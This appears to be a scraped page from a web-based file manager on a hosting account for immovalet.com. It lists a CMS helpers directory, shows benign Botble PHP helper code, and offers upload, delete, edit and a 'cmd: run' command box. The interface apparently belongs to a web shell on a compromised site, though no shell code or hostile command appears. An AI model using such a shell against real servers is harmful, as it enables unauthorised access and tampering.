/
home
/
techb158
/
immovalet.com
/
platform
/
core
/
table
/
helpers
/
/home/techb158/immovalet.com/platform/core/table/helpers
mkdir
upload
Name
Size
Mode
Actions
common.php
701
0644
edit
dl
rm
constants.php
549
0644
edit
dl
rm
Edit:
/home/techb158/immovalet.com/platform/core/table/helpers/common.php
(701B)
<?php if (!function_exists('table_checkbox')) { /** * @param int $id * @return string * @throws Throwable */ function table_checkbox($id): string { return view('core/table::partials.checkbox', compact('id'))->render(); } } if (!function_exists('table_actions')) { /** * @param string $edit * @param string $delete * @param \Botble\Base\Models\BaseModel $item * @param string $extra * @return string * @throws Throwable */ function table_actions($edit, $delete, $item, $extra = null): string { return view('core/table::partials.actions', compact('edit', 'delete', 'item', 'extra'))->render(); } }
Save
cmd:
run